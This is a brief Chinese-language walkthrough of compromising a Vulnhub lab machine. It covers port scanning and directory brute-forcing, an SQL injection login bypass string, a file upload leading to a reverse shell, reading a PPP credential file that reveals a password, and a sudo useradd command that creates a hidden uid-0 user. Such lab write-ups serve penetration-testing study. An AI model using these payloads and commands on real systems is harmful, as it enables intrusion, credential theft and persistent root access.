kali：192.168.111.111

靶机：192.168.111.234

信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.234

80端口目录爆破

gobuster dir -u http://192.168.111.234/lot -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,bak,txt,html,sql,zip,phtml,sh,pcapng,pcap,conf

漏洞利用

访问admin目录进入后台登录界面，登录处存在万能密码

admin'or 1=1#

登录后存在任意文件上传

上传后文件位置/lot/admin/assets/uploads/maps/

获得反弹shell

提权

查看/etc/ppp/chap-secrets，得到ppp用户密码：ESRxd7856HVJB

ppp用户sudo权限

创建root权限的用户

sudo -u root /usr/sbin/useradd -p `openssl passwd -1 a` a -o -u 0 -g root

本栏目推荐文章
• vulnhub-DC-6
• vulnhub靶场渗透学习
• vulnhub-DC-5
• Lab 1-Vulnhub - Kioptix Level 1
• vulnhub-symfonos
• Vulnhub-Vulnos:2-WP
• Vulnhub-EVM-WP
• vulnhub-DC-4
• vulnhub Me and My Girlfriend靶场
• vulnhub DC-2靶场

靶机 Vulnhub INO靶机vulnhub ino 靶机vulnhub dc 靶机hacksudo过程vulnhub 靶机metasploit过程vulnhub 靶机devrandom过程vulnhub 靶机healthcare过程vulnhub 靶机photographer过程vulnhub 靶机driftingblues vulnhub 靶机lunchbreaker过程vulnhub 靶机inclusiveness过程vulnhub